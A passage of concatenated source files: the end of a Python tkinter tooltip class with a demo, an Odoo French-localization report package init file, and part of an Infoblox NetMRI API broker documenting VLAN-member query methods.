self._cancel_timer()
self._hide_text()
def _start_timer(self):
self._future_id = self._widget.after(self._timeout, self._show_text)
def _cancel_timer(self):
future = self._future_id
self._future_id = None
if future is not None:
self._widget.after_cancel(future)
def _hide_text(self):
tw = self._tool_tip_window
self._tool_tip_window = None
if tw is not None:
tw.destroy()
def _show_text(self):
self._hide_text()
x, y = self._widget.winfo_pointerx() + 15, self._widget.winfo_pointery() + 5
self._tool_tip_window = tk.Toplevel(self._widget)
self._tool_tip_window.wm_overrideredirect(True)
self._tool_tip_window.wm_geometry("+{}+{}".format(x, y))
label = ttk.Label(self._tool_tip_window, text=self._text,
wraplength = self._width, anchor="center")
self.configure_label(label)
label.grid(ipadx=2, ipady=2)
def configure_label(self, label):
label["background"] = "#ffffff"
label["relief"] = "solid"
label["borderwidth"] = 1
label["justify"] = "left"
@property
def timeout(self):
"""Time before the tooltip is displayed. Returns a
:class:`datetime.timedelta` instance. May be set with such an instance
or an integer number of milliseconds.
"""
return datetime.timedelta(seconds = self._timeout / 1000)
@timeout.setter
def timeout(self, value):
try:
self._timeout = int(value.total_seconds() * 1000)
except:
self._timeout = value
@property
def width(self):
"""Maximum width of the tooltop before text is wrapped."""
return self._width
@width.setter
def width(self, value):
self._width = value
@property
def text(self):
"""The text which is displayed."""
return self._text
@text.setter
def text(self, value):
self._text = value
class ToolTipYellow(ToolTip):
"""As :class:`ToolTip` but with a yellow background."""
def configure_label(self, label):
super().configure_label(label)
label["background"] = "#ffff99"
# A demo / test
if __name__ == "__main__":
root = tk.Tk()
#import tkinter.ttk as ttk
button = ttk.Button(root, text="Button 1")
button.grid(padx=10, pady=10)
ToolTip(button, "Some text here")
button = ttk.Button(root, text="Button 2")
button.grid(padx=10, pady=10)
ToolTip(button, "For instance, on the planet Earth, man had always assumed "
+"that he was more intelligent than dolphins because he had achieved "
+"so much—the wheel, New York, wars and so on—whilst all the dolphins "
+"had ever done was muck about in the water having a good time. But "
+"conversely, the dolphins had always believed that they were far more "
+"intelligent than man—for precisely the same reasons.")
entry = ttk.Entry(root)
entry.grid(padx=10, pady=10)
ToolTipYellow(entry, "Some more text")
root.mainloop()
| artistic-2.0 |
vrenaville/OCB | addons/l10n_fr/report/__init__.py | 424 | 1475 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
import base_report
import bilan_report
import compute_resultant_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
infobloxopen/infoblox-netmri | infoblox_netmri/api/broker/v2_4_0/vlan_member_broker.py | 16 | 106771 | from ..broker import Broker
class VlanMemberBroker(Broker):
controller = "vlan_members"
def show(self, **kwargs):
"""Shows the details for the specified vlan member.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_member: The vlan member identified by the specified VlanMemberID.
:rtype vlan_member: VlanMember
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available vlan members. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available vlan members matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
:type BaseBridgeAddress: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
:type BaseBridgeAddress: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
:type BaseNumPorts: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
:type BaseNumPorts: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
:type BridgeMemberInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
:type BridgeMemberInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
:type RootBridgeAddress: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
:type RootBridgeAddress: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeForwardDelay: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeForwardDelay: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeHelloTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeHelloTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeMaxAge: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeMaxAge: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
:type StpDesignatedRoot: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
:type StpDesignatedRoot: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
:type StpForwardDelay: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
:type StpForwardDelay: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
:type StpHelloTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
:type StpHelloTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
:type StpHoldTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
:type StpHoldTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
:type StpMaxAge: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
:type StpMaxAge: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
:type StpPriority: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
:type StpPriority: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
:type StpProtocolSpecification: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
:type StpProtocolSpecification: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
:type StpRootCost: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
:type StpRootCost: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
:type StpRootPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
:type StpRootPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
:type StpTopChanges: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
:type StpTopChanges: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VTPDomain: Management domain name if VLAN is VTP managed.
:type VTPDomain: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VTPDomain: Management domain name if VLAN is VTP managed.
:type VTPDomain: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
:type VlanMemberChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
:type VlanMemberChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type VlanMemberEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type VlanMemberEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberStartTime: The starting effective time of this revision of the record.
:type VlanMemberStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberStartTime: The starting effective time of this revision of the record.
:type VlanMemberStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberTimestamp: The date and time this record was collected or calculated.
:type VlanMemberTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberTimestamp: The date and time this record was collected or calculated.
:type VlanMemberTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
:type VlanName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
:type VlanName: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
:type VlanState: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
:type VlanState: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
:type VlanType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
:type VlanType: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against vlan members, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available vlan members matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseBridgeAddress: The operator to apply to the field BaseBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseBridgeAddress: If op_BaseBridgeAddress is specified, the field named in this input will be compared to the value in BaseBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_f_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseBridgeAddress: If op_BaseBridgeAddress is specified, this value will be compared to the value in BaseBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
